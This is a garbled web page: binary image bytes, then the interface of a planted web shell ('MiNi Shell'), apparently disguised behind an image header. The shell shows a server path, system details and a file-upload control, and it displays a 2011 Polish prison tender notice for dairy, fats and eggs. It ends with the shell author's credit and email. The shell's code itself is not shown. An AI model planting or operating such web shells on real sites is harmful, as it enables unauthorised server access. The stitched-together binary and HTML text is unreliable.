JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111121/303457-N-2011.html

<p class="kh_header"><b>Cieszyn: Dostawa produktów mleczarskich, olejów i tłuszczów roślinnych lub zwierzęcych, jaj kurzych konsumpcyjnych dla potrzeb Zakładu Karnego w Cieszynie</b><br>
<b>Numer ogłoszenia: 303457 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Cieszynie , ul. Chrobrego 2, 43-400 Cieszyn, woj. śląskie, tel. 033 8513220, 8513270, faks 033 8511755.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sw.gov.pl/pl/okregowy-inspektorat-sluzby-wieziennej-katowice/zaklad-karny-cieszyn</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów mleczarskich, olejów i tłuszczów roślinnych lub zwierzęcych, jaj kurzych konsumpcyjnych dla potrzeb Zakładu Karnego w Cieszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest dostawa produktów mleczarskich, olejów i tłuszczów roślinnych lub zwierzęcych, jaj kurzych konsumpcyjnych - wg Wspólnego Słownika Zamówień główny przedmiot: kod CPV 15000000-8.
Zamówienie podzielone jest na trzy części, przy czym dla części:

A.	pierwszej

Przedmiotem zamówienia publicznego jest sukcesywna dostawa produktów mleczarskich, wg Wspólnego Słownika Zamówień: kod CPV 15500000-3
       w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	Kefir	litr	600
2.	Mleko granulowane	kg.	1000
3.	Twaróg	kg.	2250
4.	Serek naturalny homog.	kg.	1700
5.	Produkt topiony do smarowania - kostka 100g/szt.	kg.	1300
6.	Serek maślany kanapkowy	kg.	700
7.	Serek Fromage	kg.	970
8.	Ser twardy 	kg.	950
9.	Śmietana 12%	litr	600



KEFIR
Skład: mleko pasteryzowane, żywe kultury bakterii, zawartość tłuszczu 1,5%

MLEKO GRANULOWANE - odtłuszczone rozpuszczalne, w opakowaniach jednostkowych do 20 kg.

TWARÓG PÓŁTŁUSTY
Ser biały - wytwarzany z mleka, o białej barwie i grudkowatej bądź kremowej konsystencji,
bez dodatków, w opakowaniu jednostkowym 0,25 kg/szt., etykietowany z naniesioną na każdym bloku datą przydatności do spożycia oraz składem chemicznym i surowcowym

SEREK NATURALNY HOMOGENIZOWANY 
Skład: mleko odtłuszczone, śmietanka, zawartość tłuszczu 3%, w opakowaniu jednostkowym od 100 do 150g./sztuka, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

PRODUKT TOPIONY DO SMAROWANIA - kostka 100 g/sztuka,
etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

SEREK MAŚLANY - KANAPKOWY
Skład: twaróg, tłuszcz mleczny 15 %, sól, skrobia modyfikowana, zagęstnik - guma guar,
w opakowaniu jednostkowym od 100 do 150g./sztuka, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

SEREK FROMAGE
Skład: twaróg, tłuszcz roślinny, sól, konserwant, opakowanie jednostkowe 100g/sztukę z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

SER TWARDY 
Foliowany w opakowaniu jednostkowym max.3 kg./blok, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

ŚMIETANA
Skład: śmietanka pasteryzowana, żywe kultury bakterii, tłuszcz 12%, o pojemności jednej sztuki nie przekraczającej 1 litra, etykietowana z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

Towar dostarczany będzie zamawiającemu do godz.11 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
Częstotliwość realizacji dostaw: 1 raz w tygodniu.
Minimalny okres przydatności do spożycia: licząc od daty dostarczenia towaru do magazynu Zakładu Karnego w Cieszynie, nie może być krótszy niż 14 dni.

Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.


B.	drugiej
Przedmiotem zamówienia publicznego jest sukcesywna dostawa oleju i tłuszczów zwierzęcych lub roślinnych dla potrzeb zamawiającego, wg Wspólnego Słownika Zamówień: kod CPV 15400000-2 w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	Margaryna	kg.	4600
2.	Tłuszcz roślinny	kg.	2900
3.	Smalec wieprzowy	kg.	300
4.	Olej roślinny rzepakowy	litr	1200


Margaryna - tłuszcz roślinny do smarowania pieczywa o maksymalnej zawartości tłuszczu do 60%, opakowanie jednostkowe 0,2 lub 0,25 kg.

Tłuszcz roślinny do smarowania pieczywa o niskiej zawartości tłuszczu do 60% typu masło roślinne, opakowanie jednostkowe 0,2 lub 0,25 kg.

Smalec wieprzowy, w opakowaniach jednostkowych 0,2 kg.

Olej roślinny rzepakowy w opakowaniach jednostkowych od 1 litra do 5 litrów.

Bieżąca realizacja dostaw: dostawy realizowane będą w częściach zgodnie z wcześniejszym telefonicznym zamówieniem, w którym Zamawiający określi asortyment wraz z ilością. Zamówienie takie przeprowadzane będzie z tygodniowym wyprzedzeniem względem daty dostawy. Towar dostarczany będzie zamawiającemu do godz.12 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.

Częstotliwość realizacji dostaw: jeden raz w tygodniu.
Minimalny okres przydatności do spożycia: licząc od daty dostarczenia towaru do magazynu Zakładu Karnego w Cieszynie, nie może być krótszy niż 30 dni.
Wszystkie partie towaru winny być oznakowane.
Oznakowanie towaru powinno być zgodne z obowiązującymi przepisami (m.in. nazwa producenta, termin przydatności do spożycia, gramatura). Wykonawca zobowiązany jest dostarczyć Zamawiającemu Handlowy Dokument Identyfikacyjny (HDI) dla tych partii towaru, dla których posiadanie wymienionego dokumentu jest wymagane.

Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.

C.	trzeciej
Przedmiotem zamówienia publicznego jest sukcesywna jaj kurzych dla potrzeb zamawiającego, wg Wspólnego Słownika Zamówień: kod CPV 03142500-3 w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	jaja kurze	szt.	66 000



Warunki dodatkowe dotyczące przedmiotu zamówienia:
Jaja konsumpcyjne kurze, świeże Klasa A, grupa wagowa M (waga 53-63 g/szt.) dostawa jeden raz w tygodniu.

Oznakowanie towaru powinno być zgodne z obowiązującymi przepisami (m.in. nazwa producenta, termin przydatności do spożycia, gramatura). Wykonawca zobowiązany jest dostarczyć Zamawiającemu Handlowy Dokument Identyfikacyjny (HDI) dla tych partii towaru, dla których posiadanie wymienionego dokumentu jest wymagane.

Dostawy będą realizowane w dni robocze do godziny 1200.
Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.40.00.00-2, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany w umowie w zakresie:
1.	osób powołanych do reprezentacji stron;
2.	zmiany wartości umowy o różnicę wynikającą ze zmiany wartości podatku VAT w przypadku zmiany stawki podatku VAT w trakcie obowiązywania umowy;
3. wynikającym z zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl/pl/okregowy-inspektorat-sluzby-wieziennej-katowice/zaklad-karny-cieszyn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Cieszynie, ul. B. Chrobrego 2, 43-400 Cieszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 09:00, miejsce: sekretariat Zakładu Karnego w Cieszynie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sukcesywna dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest sukcesywna dostawa produktów mleczarskich, wg Wspólnego Słownika Zamówień: kod CPV 15500000-3
       w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	Kefir	litr	600
2.	Mleko granulowane	kg.	1000
3.	Twaróg	kg.	2250
4.	Serek naturalny homog.	kg.	1700
5.	Produkt topiony do smarowania - kostka 100g/szt.	kg.	1300
6.	Serek maślany kanapkowy	kg.	700
7.	Serek Fromage	kg.	970
8.	Ser twardy 	kg.	950
9.	Śmietana 12%	litr	600



KEFIR
Skład: mleko pasteryzowane, żywe kultury bakterii, zawartość tłuszczu 1,5%

MLEKO GRANULOWANE - odtłuszczone rozpuszczalne, w opakowaniach jednostkowych do 20 kg.

TWARÓG PÓŁTŁUSTY
Ser biały - wytwarzany z mleka, o białej barwie i grudkowatej bądź kremowej konsystencji,
bez dodatków, w opakowaniu jednostkowym 0,25 kg/szt., etykietowany z naniesioną na każdym bloku datą przydatności do spożycia oraz składem chemicznym i surowcowym

SEREK NATURALNY HOMOGENIZOWANY 
Skład: mleko odtłuszczone, śmietanka, zawartość tłuszczu 3%, w opakowaniu jednostkowym od 100 do 150g./sztuka, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

PRODUKT TOPIONY DO SMAROWANIA - kostka 100 g/sztuka,
etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

SEREK MAŚLANY - KANAPKOWY
Skład: twaróg, tłuszcz mleczny 15 %, sól, skrobia modyfikowana, zagęstnik - guma guar,
w opakowaniu jednostkowym od 100 do 150g./sztuka, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

SEREK FROMAGE
Skład: twaróg, tłuszcz roślinny, sól, konserwant, opakowanie jednostkowe 100g/sztukę z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

SER TWARDY 
Foliowany w opakowaniu jednostkowym max.3 kg./blok, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

ŚMIETANA
Skład: śmietanka pasteryzowana, żywe kultury bakterii, tłuszcz 12%, o pojemności jednej sztuki nie przekraczającej 1 litra, etykietowana z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym.

Towar dostarczany będzie zamawiającemu do godz.11 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
Częstotliwość realizacji dostaw: 1 raz w tygodniu.
Minimalny okres przydatności do spożycia: licząc od daty dostarczenia towaru do magazynu Zakładu Karnego w Cieszynie, nie może być krótszy niż 14 dni.

Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa oleju i tłuszczów roślinnych lub zwierzęcych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest sukcesywna dostawa oleju i tłuszczów zwierzęcych lub roślinnych dla potrzeb zamawiającego, wg Wspólnego Słownika Zamówień: kod CPV 15400000-2 w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	Margaryna	kg.	4600
2.	Tłuszcz roślinny	kg.	2900
3.	Smalec wieprzowy	kg.	300
4.	Olej roślinny rzepakowy	litr	1200


Margaryna - tłuszcz roślinny do smarowania pieczywa o maksymalnej zawartości tłuszczu do 60%, opakowanie jednostkowe 0,2 lub 0,25 kg.

Tłuszcz roślinny do smarowania pieczywa o niskiej zawartości tłuszczu do 60% typu masło roślinne, opakowanie jednostkowe 0,2 lub 0,25 kg.

Smalec wieprzowy, w opakowaniach jednostkowych 0,2 kg.

Olej roślinny rzepakowy w opakowaniach jednostkowych od 1 litra do 5 litrów.

Bieżąca realizacja dostaw: dostawy realizowane będą w częściach zgodnie z wcześniejszym telefonicznym zamówieniem, w którym Zamawiający określi asortyment wraz z ilością. Zamówienie takie przeprowadzane będzie z tygodniowym wyprzedzeniem względem daty dostawy. Towar dostarczany będzie zamawiającemu do godz.12 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.

Częstotliwość realizacji dostaw: jeden raz w tygodniu.
Minimalny okres przydatności do spożycia: licząc od daty dostarczenia towaru do magazynu Zakładu Karnego w Cieszynie, nie może być krótszy niż 30 dni.
Wszystkie partie towaru winny być oznakowane.
Oznakowanie towaru powinno być zgodne z obowiązującymi przepisami (m.in. nazwa producenta, termin przydatności do spożycia, gramatura). Wykonawca zobowiązany jest dostarczyć Zamawiającemu Handlowy Dokument Identyfikacyjny (HDI) dla tych partii towaru, dla których posiadanie wymienionego dokumentu jest wymagane.

Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywna dostawa jaj kurzych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest sukcesywna jaj kurzych dla potrzeb zamawiającego, wg Wspólnego Słownika Zamówień: kod CPV 03142500-3 w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	jaja kurze	szt.	66 000



Warunki dodatkowe dotyczące przedmiotu zamówienia:
Jaja konsumpcyjne kurze, świeże Klasa A, grupa wagowa M (waga 53-63 g/szt.) dostawa jeden raz w tygodniu.

Oznakowanie towaru powinno być zgodne z obowiązującymi przepisami (m.in. nazwa producenta, termin przydatności do spożycia, gramatura). Wykonawca zobowiązany jest dostarczyć Zamawiającemu Handlowy Dokument Identyfikacyjny (HDI) dla tych partii towaru, dla których posiadanie wymienionego dokumentu jest wymagane.

Dostawy będą realizowane w dni robocze do godziny 1200.
Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com